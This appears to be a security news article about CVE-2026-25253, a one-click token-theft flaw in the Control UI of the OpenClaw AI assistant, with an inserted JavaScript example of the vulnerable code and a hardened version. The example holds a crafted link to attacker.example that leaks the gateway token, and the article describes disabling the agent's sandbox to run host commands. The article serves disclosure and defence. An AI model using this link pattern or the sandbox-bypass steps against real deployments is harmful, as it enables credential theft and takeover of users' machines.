Critical Vulnerability Discovered in OpenClaw AI Personal Assistant

By Tina Reynolds

A critical remote code execution (RCE) vulnerability has been disclosed in OpenClaw, an open-source, decentralized, autonomous AI personal assistant that runs locally on user devices. The flaw, tracked as CVE-2026-25253, carries a CVSS score of 8.8. It was found by Mav Levin, a founding security researcher at Depthfirst, and allows a threat actor to execute code on the victim's machine after a single click on a harmful URL.

OpenClaw, which connects to chat platforms such as WhatsApp and Telegram, drew heavy attention within days of its first public release in November 2025, and its main GitHub repository has since grown to over 149,000 stars. That popularity also widens the blast radius of this finding: every deployment (the researcher's advisory refers to it as Moltbot) in which a user has logged into the Control UI is exposed.

Nature of the Vulnerability

CVE-2026-25253 is an authentication bypass, classified as a token exfiltration vulnerability that leads to full gateway compromise. A malicious web page can use client-side JavaScript in the victim's browser to obtain the stored gateway authentication token: when the user clicks a crafted link or visits a malicious site, the Control UI is made to hand that token to an attacker-controlled server.

The attack is especially alarming because it bypasses the protections users would expect to be built into OpenClaw's architecture. Peter Steinberger summarized the chain as follows:

“Clicking a crafted link or visiting a malicious site can send the token to an attacker-controlled server. The attacker can then connect to the victim’s local gateway, modify config (sandbox, tool policies), and invoke privileged actions, achieving 1-click RCE.”

Once the token has been stolen, the attacker can connect to the victim's local gateway with operator-level privileges, change its configuration (including the sandbox and tool policies) and execute commands on the host machine. Levin described the root cause in the Control UI:

“The Control UI trusts gatewayUrl from the query string without validation and auto-connects on load, sending the stored gateway token in the WebSocket connect payload.”
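The following is an added illustration, not code from OpenClaw or from the researchers, of the client-side pattern Levin describes: a Control UI that takes `gatewayUrl` from the query string unvalidated and auto-connects with its stored token, beside one way to harden it. The function names, the sample token and the loopback/same-host allow-list policy are assumptions made for the example; the real project's URL handling and token storage are not shown on this page.

```javascript
// Added example (not OpenClaw's code). Demonstrates why trusting
// ?gatewayUrl= on page load leaks the stored gateway token, and one
// hardened alternative. All names and values here are constructed.
const STORED_TOKEN = "constructed-example-token"; // stands in for the saved gateway token

// Vulnerable pattern: whatever gatewayUrl the query string carries becomes the
// WebSocket target, and the connect payload always includes the stored token.
// A crafted link such as ?gatewayUrl=wss://attacker.example/ws therefore
// sends the token straight to the attacker's server.
function vulnerableConnectPayload(pageUrl, defaultGateway) {
  const params = new URL(pageUrl).searchParams;
  const gatewayUrl = params.get("gatewayUrl") || defaultGateway;
  return { target: gatewayUrl, connect: { token: STORED_TOKEN } };
}

// Hardened policy (assumed for this example): a gateway URL supplied by the
// page URL is only honoured if it is a ws/wss URL whose host is the page's own
// host or a loopback address. Anything else is refused and no token is sent.
function isTrustedGateway(candidate, pageUrl) {
  let u;
  try {
    u = new URL(candidate);
  } catch {
    return false; // unparsable input is never a valid gateway
  }
  if (u.protocol !== "ws:" && u.protocol !== "wss:") return false;
  const page = new URL(pageUrl);
  const sameHost = u.hostname === page.hostname;
  const loopback = ["localhost", "127.0.0.1", "[::1]"].includes(u.hostname);
  return sameHost || loopback;
}

function hardenedConnectPayload(pageUrl, defaultGateway) {
  const params = new URL(pageUrl).searchParams;
  const requested = params.get("gatewayUrl");
  if (requested !== null && !isTrustedGateway(requested, pageUrl)) {
    // Refuse to auto-connect; the token never leaves the page.
    return { target: null, connect: null, reason: "untrusted gatewayUrl rejected" };
  }
  const gatewayUrl = requested || defaultGateway;
  return { target: gatewayUrl, connect: { token: STORED_TOKEN } };
}

// Constructed crafted link, as an attacker might send it to a logged-in user.
const craftedLink = "https://control.example/?gatewayUrl=wss://attacker.example/ws";
console.log("vulnerable:", vulnerableConnectPayload(craftedLink, "ws://127.0.0.1:18789"));
console.log("hardened:", hardenedConnectPayload(craftedLink, "ws://127.0.0.1:18789"));
```

The allow-list is deliberately narrow; a stricter design would ignore the parameter entirely and require an explicit user action before any connection carries a credential, which removes the one-click path altogether.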

Exploitation Mechanics

With the stolen token in hand, the attacker can issue node.invoke requests to the gateway API with operator-level access. That access permits arbitrary configuration changes and arbitrary code execution on the gateway host itself; in particular, the attacker can disable the sandbox setting before invoking commands:

“This forces the agent to run commands directly on the host machine, not inside a Docker container.”

The good news is that the OpenClaw team has patched this vulnerability in version 2026.1.29, which was published on January 30, 2026. All users are urged to immediately upgrade their deployments to this version to reduce the risk posed by CVE-2026-25253.

Levin summarized who is affected and what the attacker gains:

“It impacts any Moltbot deployment where a user has authenticated to the Control UI. The attacker gains operator-level access to the gateway API, enabling arbitrary config changes and code execution on the gateway host.”

Mitigation Measures

The fix is the patched release: upgrade every deployment to 2026.1.29 or later. Note that the bypass lives in the Control UI's handling of the gatewayUrl parameter, not in the agent's tooling, so OpenClaw's sandbox and tool policies offer no protection here; once connected, the attacker can reconfigure those very policies.

Despite the measures taken in the latest version, Levin cautioned that existing defenses may not adequately protect users from this type of threat:

“I would say the problem is those defenses (sandbox and safety guardrails) were designed to contain malicious actions of an LLM, as a result of prompt injection, for example. And users might think these defenses would protect from this vulnerability (or limit the blast radius), but they don’t.”

OpenClaw remains a powerful tool for users seeking an AI personal assistant that operates fully under their control. As Steinberger noted:

“OpenClaw is an open agent platform that runs on your machine and works from the chat apps you already use.”